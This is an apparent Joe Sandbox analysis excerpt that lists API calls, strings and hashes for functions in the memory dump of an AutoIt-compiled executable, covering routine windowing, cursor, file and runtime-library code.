[ACTIVE, xrefs: 00C5D740
REGEXP=, xrefs: 00C5D768
[REGEXPTITLE:, xrefs: 00C5D77B
HANDLE=, xrefs: 00C5D74C
ACTIVE, xrefs: 00C5D72E
ALL, xrefs: 00C5D7E7
[LAST, xrefs: 00C5D800
[HANDLE:, xrefs: 00C5D75F
[CLASS:, xrefs: 00C5D7A3

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 35d5345e3fa4bf566ba54c790c11ba2f2999613413d04ee956ff46804490b8ad
Instruction ID: 15647e501f8ea9e0760af848a152f39da53d7976acd6d067fefd0af585d5f63c
Opcode Fuzzy Hash: 35d5345e3fa4bf566ba54c790c11ba2f2999613413d04ee956ff46804490b8ad
Instruction Fuzzy Hash: 0C31F235544304EBEB24EB50ED43EED73649F20711F20003AF953715D5EBA1AF88E669

Function 00C5EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00C5EAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C5EAC2
SetWindowTextW.USER32(?,?), ref: 00C5EAD9
GetDlgItem.USER32(?,000003EA), ref: 00C5EAEE
SetWindowTextW.USER32(00000000,?), ref: 00C5EAF4
GetDlgItem.USER32(?,000003E9), ref: 00C5EB04
SetWindowTextW.USER32(00000000,?), ref: 00C5EB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C5EB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C5EB45
GetWindowRect.USER32(?,?), ref: 00C5EB4E
SetWindowTextW.USER32(?,?), ref: 00C5EBB9
GetDesktopWindow.USER32 ref: 00C5EBBF
GetWindowRect.USER32(00000000), ref: 00C5EBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00C5EC12
GetClientRect.USER32(?,?), ref: 00C5EC1F
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00C5EC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C5EC6F

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 92891a4cab05682f185b71d7248bb2d09050eda2503bbfe423759d2b591033f5
Instruction ID: 67ed4d1f1007c7d9d6a7171087a176f955717df5a8bbef865235b4414a89b61c
Opcode Fuzzy Hash: 92891a4cab05682f185b71d7248bb2d09050eda2503bbfe423759d2b591033f5
Instruction Fuzzy Hash: D9514E75900709AFDB24DFA8CD89F6EBBF5FF0470AF004918E557A25A0C774AA48DB14

Function 00C779B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00C779C6
LoadCursorW.USER32(00000000,00007F00), ref: 00C779D1
LoadCursorW.USER32(00000000,00007F03), ref: 00C779DC
LoadCursorW.USER32(00000000,00007F8B), ref: 00C779E7
LoadCursorW.USER32(00000000,00007F01), ref: 00C779F2
LoadCursorW.USER32(00000000,00007F81), ref: 00C779FD
LoadCursorW.USER32(00000000,00007F88), ref: 00C77A08
LoadCursorW.USER32(00000000,00007F80), ref: 00C77A13
LoadCursorW.USER32(00000000,00007F86), ref: 00C77A1E
LoadCursorW.USER32(00000000,00007F83), ref: 00C77A29
LoadCursorW.USER32(00000000,00007F85), ref: 00C77A34
LoadCursorW.USER32(00000000,00007F82), ref: 00C77A3F
LoadCursorW.USER32(00000000,00007F84), ref: 00C77A4A
LoadCursorW.USER32(00000000,00007F04), ref: 00C77A55
LoadCursorW.USER32(00000000,00007F02), ref: 00C77A60
LoadCursorW.USER32(00000000,00007F89), ref: 00C77A6B
GetCursorInfo.USER32(?), ref: 00C77A7B

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 803d91298fd82645f8b3034de03a3d3cb36d6877ce7160fcd60522b2db657b5d
Instruction ID: e68d52b9a2abdea5173366356bf97b7841d48c472c68226fb5cbbe3965c78975
Opcode Fuzzy Hash: 803d91298fd82645f8b3034de03a3d3cb36d6877ce7160fcd60522b2db657b5d
Instruction Fuzzy Hash: CA3115B0D0831E6ADF109FB68C8995FBFE8FF04750F50453AA50DE7280DA78A5008FA1

Function 00C2C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 00C3E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C2C8B7,?,00002000,?,?,00000000,?,00C2419E,?,?,?,00CBDC00), ref: 00C3E984

Part of subcall function 00C2660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C253B1,?,?,00C261FF,?,00000000,00000001,00000000), ref: 00C2662F

__wsplitpath.LIBCMT ref: 00C2C93E

Part of subcall function 00C41DFC: __wsplitpath_helper.LIBCMT ref: 00C41E3C

_wcscpy.LIBCMT ref: 00C2C953
_wcscat.LIBCMT ref: 00C2C968
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00C2C978
SetCurrentDirectoryW.KERNEL32(?), ref: 00C2CABE

Part of subcall function 00C2B337: _wcscpy.LIBCMT ref: 00C2B36F

Strings

Unterminated string, xrefs: 00C93470
>>>AUTOIT SCRIPT<<<, xrefs: 00C9311B
EA06, xrefs: 00C930C9
Bad directive syntax error, xrefs: 00C93429
AU3!, xrefs: 00C2C90C
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00C93098
Error opening the file, xrefs: 00C930B4, 00C9313D

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2258743419-1018226102
Opcode ID: 2cd1cd8a0a1fb75037796f05b7247ec0c49e38d8daf7cd77220648e94e2c4a37
Instruction ID: e7e3b0562d64f8a46644fe235e9bf79b146ecceea8c0b0a97daeb46f43860c20
Opcode Fuzzy Hash: 2cd1cd8a0a1fb75037796f05b7247ec0c49e38d8daf7cd77220648e94e2c4a37
Instruction Fuzzy Hash: 0012A1715083419FCB24EF24D881AAFBBF5BF99304F00491EF59A93661DB30DA49EB52

Function 00C8CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C8CEFB
DestroyWindow.USER32(?,?), ref: 00C8CF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C8CFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C8D016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C8D025
DestroyWindow.USER32(?), ref: 00C8D042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C20000,00000000), ref: 00C8D075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C8D094
GetDesktopWindow.USER32 ref: 00C8D0A9
GetWindowRect.USER32(00000000), ref: 00C8D0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C8D0C2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C8D0DA

Part of subcall function 00C3B526: GetWindowLongW.USER32(?,000000EB), ref: 00C3B537

Strings

0, xrefs: 00C8CF1B
tooltips_class32, xrefs: 00C8CFED, 00C8D06E

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$tooltips_class32
API String ID: 3877571568-3619404913
Opcode ID: 1288a3e29f03c01d310dc1a8d00c97d27020af4bce4ad3552e869856651e3d16
Instruction ID: ef3264b564979893f4ca4103e65cc974b75014ef41e207a6b71d908936268768
Opcode Fuzzy Hash: 1288a3e29f03c01d310dc1a8d00c97d27020af4bce4ad3552e869856651e3d16
Instruction Fuzzy Hash: 3671E170140345AFD724DF28CC85FAA77E9FB89708F48451DF9968B2A1D730E942DB26

Function 00C8F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C3B35F

DragQueryPoint.SHELL32(?,?), ref: 00C8F37A

Part of subcall function 00C8D7DE: ClientToScreen.USER32(?,?), ref: 00C8D807
Part of subcall function 00C8D7DE: GetWindowRect.USER32(?,?), ref: 00C8D87D
Part of subcall function 00C8D7DE: PtInRect.USER32(?,?,00C8ED5A), ref: 00C8D88D

SendMessageW.USER32(?,000000B0,?,?), ref: 00C8F3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C8F3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C8F411
_wcscat.LIBCMT ref: 00C8F441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C8F458
SendMessageW.USER32(?,000000B0,?,?), ref: 00C8F471
SendMessageW.USER32(?,000000B1,?,?), ref: 00C8F488
SendMessageW.USER32(?,000000B1,?,?), ref: 00C8F4AA
DragFinish.SHELL32(?), ref: 00C8F4B1
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C8F59C

Strings

@GUI_DROPID, xrefs: 00C8F4D1
@GUI_DRAGID, xrefs: 00C8F510
@GUI_DRAGFILE, xrefs: 00C8F54B

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: b0677db4e3e6bb11093d2fd014dc05db36205af88765f3ac7f1bb833337705d4
Instruction ID: 986b5fcd737c3609a899584e18f68e92be05e20fe057cdc1edc610968b722675
Opcode Fuzzy Hash: b0677db4e3e6bb11093d2fd014dc05db36205af88765f3ac7f1bb833337705d4
Instruction Fuzzy Hash: 5B612771108301AFC711EF64DC85E9FBBE8EF99714F000A2EF696921A1DB709A09DB52

Function 00C6AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00C6AB3D
VariantCopy.OLEAUT32(?,?), ref: 00C6AB46
VariantClear.OLEAUT32(?), ref: 00C6AB52
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00C6AC40
__swprintf.LIBCMT ref: 00C6AC70
VarR8FromDec.OLEAUT32(?,?), ref: 00C6AC9C
VariantInit.OLEAUT32(?), ref: 00C6AD4D
SysFreeString.OLEAUT32(00000016), ref: 00C6ADDF
VariantClear.OLEAUT32(?), ref: 00C6AE35
VariantClear.OLEAUT32(?), ref: 00C6AE44
VariantInit.OLEAUT32(00000000), ref: 00C6AE80

Strings

Default, xrefs: 00C6ACFD
%4d%02d%02d%02d%02d%02d, xrefs: 00C6AC6A

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: ba7b72955484bf00ae9c3922b2a70f0f675402866e09ae5347fe7941709f8a0e
Instruction ID: 58fd6e903862f335aeaa8487063b3b69ddf1f1d387b64db81ed39ae336602a49
Opcode Fuzzy Hash: ba7b72955484bf00ae9c3922b2a70f0f675402866e09ae5347fe7941709f8a0e
Instruction Fuzzy Hash: 33D1FE71A04215EBCB309F66D8C4BAEB7B9FF49700F148465E416AB190DB70ED50EFA2

Function 00C8716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C871FC
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C87247

Strings

COLLAPSE, xrefs: 00C8728D
GETITEMCOUNT, xrefs: 00C87311
GETTOTALCOUNT, xrefs: 00C8722A
UNCHECK, xrefs: 00C8740B
CHECK, xrefs: 00C87267
GETTEXT, xrefs: 00C87382
EXISTS, xrefs: 00C872B0
SELECT, xrefs: 00C873E0
GETSELECTED, xrefs: 00C8733F
ISCHECKED, xrefs: 00C873B2
EXPAND, xrefs: 00C872E1

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: b9301bda2a144e8111d19cb2c5a9ab50f17f5603a9675c6a7b119f64fa6d3fe5
Instruction ID: 676661c102dfb7ffb4c99079f1f17ce0c4161b06f75d94aa2ee62e319ce9ca38
Opcode Fuzzy Hash: b9301bda2a144e8111d19cb2c5a9ab50f17f5603a9675c6a7b119f64fa6d3fe5
Instruction Fuzzy Hash: 7F9180742087019FCB04FF10D891A6EB7A1AF94314F10495DF9966B7A3EB30ED4AEB85

Function 00C8E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C8E5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00C89808,?), ref: 00C8E607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C8E647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C8E68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C8E6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,00C89808,?), ref: 00C8E6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C8E6DF
DestroyIcon.USER32(?), ref: 00C8E6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C8E70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C8E717

Part of subcall function 00C40FA7: __wcsicmp_l.LIBCMT ref: 00C41030

Strings

.dll, xrefs: 00C8E564
.exe, xrefs: 00C8E541
.icl, xrefs: 00C8E521

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: b94a2196a5bb29002dfd52b1ddff01660b9e75424819efbdde3023d8eba7a9cc
Instruction ID: 18cc0e55ae3d8322c4bcdc83ab03fabfac41bbe5d61c4f2ec4ca497863e343a8
Opcode Fuzzy Hash: b94a2196a5bb29002dfd52b1ddff01660b9e75424819efbdde3023d8eba7a9cc
Instruction Fuzzy Hash: F361D1B1540619FAEB14EF64CC46FFE77A8BB18728F104115F912E61D0EB709A80DB64

Function 00C6D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00C2936C: __swprintf.LIBCMT ref: 00C293AB
Part of subcall function 00C2936C: __itow.LIBCMT ref: 00C293DF

CharLowerBuffW.USER32(?,?), ref: 00C6D292
GetDriveTypeW.KERNEL32 ref: 00C6D2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C6D327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C6D35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C6D38C

Strings

closed, xrefs: 00C6D2A6, 00C6D2AF
set cd door , xrefs: 00C6D32D
close, xrefs: 00C6D298
open, xrefs: 00C6D2B9
wait, xrefs: 00C6D349
type cdaudio alias cd wait, xrefs: 00C6D30A
close cd wait, xrefs: 00C6D377
open , xrefs: 00C6D2EE

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: 368b63f506f7d12bf3b590225188f5252c0ddc1cd841bdc4f16306289a7a814e
Instruction ID: 1da201983702c3cb9b83f1f2d153bfdefee52be6f70dfd32711e1b23dea2f946
Opcode Fuzzy Hash: 368b63f506f7d12bf3b590225188f5252c0ddc1cd841bdc4f16306289a7a814e
Instruction Fuzzy Hash: 75513A716043159FCB00EF10D98196EB7F4EF98758F00486DF89AA76A1DB31EE06DB52

Function 00C626BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00C93973,00000016,0000138C,00000016,?,00000016,00CBDDB4,00000000,?), ref: 00C626F1
LoadStringW.USER32(00000000,?,00C93973,00000016), ref: 00C626FA
GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00C93973,00000016,0000138C,00000016,?,00000016,00CBDDB4,00000000,?,00000016), ref: 00C6271C
LoadStringW.USER32(00000000,?,00C93973,00000016), ref: 00C6271F
__swprintf.LIBCMT ref: 00C6276F
__swprintf.LIBCMT ref: 00C62780
_wprintf.LIBCMT ref: 00C62829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C62840

Strings

^ ERROR, xrefs: 00C627D5
%s (%d) : ==> %s: %s %s, xrefs: 00C62824
Line %d (File "%s"):, xrefs: 00C62769
Line %d:, xrefs: 00C6277A
Error: , xrefs: 00C627F7

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
Opcode ID: ca791798937e1c74467ca1943b7ac3a4d8dacf4e1aa09748e87f54e091371a6d
Instruction ID: fe0542ef7db869453601f4b7654a80f1f18b55dc289ab0d4b0f03968a2cb7f81
Opcode Fuzzy Hash: ca791798937e1c74467ca1943b7ac3a4d8dacf4e1aa09748e87f54e091371a6d
Instruction Fuzzy Hash: B9412172800219BBCB14FBD0ED86EEFB778AF19340F100065B60277492EA746F59EB61

Function 00C6D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C6D0D8
__swprintf.LIBCMT ref: 00C6D0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 00C6D137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C6D15C
_memset.LIBCMT ref: 00C6D17B
_wcsncpy.LIBCMT ref: 00C6D1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C6D1EC
CloseHandle.KERNEL32(00000000), ref: 00C6D1F7
RemoveDirectoryW.KERNEL32(?), ref: 00C6D200
CloseHandle.KERNEL32(00000000), ref: 00C6D20A

Strings

:, xrefs: 00C6D11B
\, xrefs: 00C6D110
\??\%s, xrefs: 00C6D0F4

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 09e2ee98cc919047fa2b851337ae91037609d95ce2d107aa2979455aef49e36d
Instruction ID: e12e7cd2a2c7766da0dec83ea954438cc08b1a3ba7ddd57a9ab76b36345eb6bf
Opcode Fuzzy Hash: 09e2ee98cc919047fa2b851337ae91037609d95ce2d107aa2979455aef49e36d
Instruction Fuzzy Hash: D5317371A00109ABDB21DFA0DC89FEF77BCAF89744F1041B5F61AD2160E7709B458B25

Function 00C587CD Relevance: 22.7, APIs: 15, Instructions: 210COMMONLIBRARYCODE

Download Yara Rule

APIs

_copy_environ.LIBCMT ref: 00C5882D
___wtomb_environ.LIBCMT ref: 00C5884F

Part of subcall function 00C47C0E: __getptd_noexit.LIBCMT ref: 00C47C0E

__malloc_crt.LIBCMT ref: 00C58875
__malloc_crt.LIBCMT ref: 00C58892
_free.LIBCMT ref: 00C588C9
__recalloc_crt.LIBCMT ref: 00C58902
__recalloc_crt.LIBCMT ref: 00C58947
_strlen.LIBCMT ref: 00C58973
__calloc_crt.LIBCMT ref: 00C5897D
_strlen.LIBCMT ref: 00C5898C
SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 00C589BA
_free.LIBCMT ref: 00C589D4
_free.LIBCMT ref: 00C589E1
_free.LIBCMT ref: 00C589F3
__invoke_watson.LIBCMT ref: 00C58A0D

Memory Dump Source

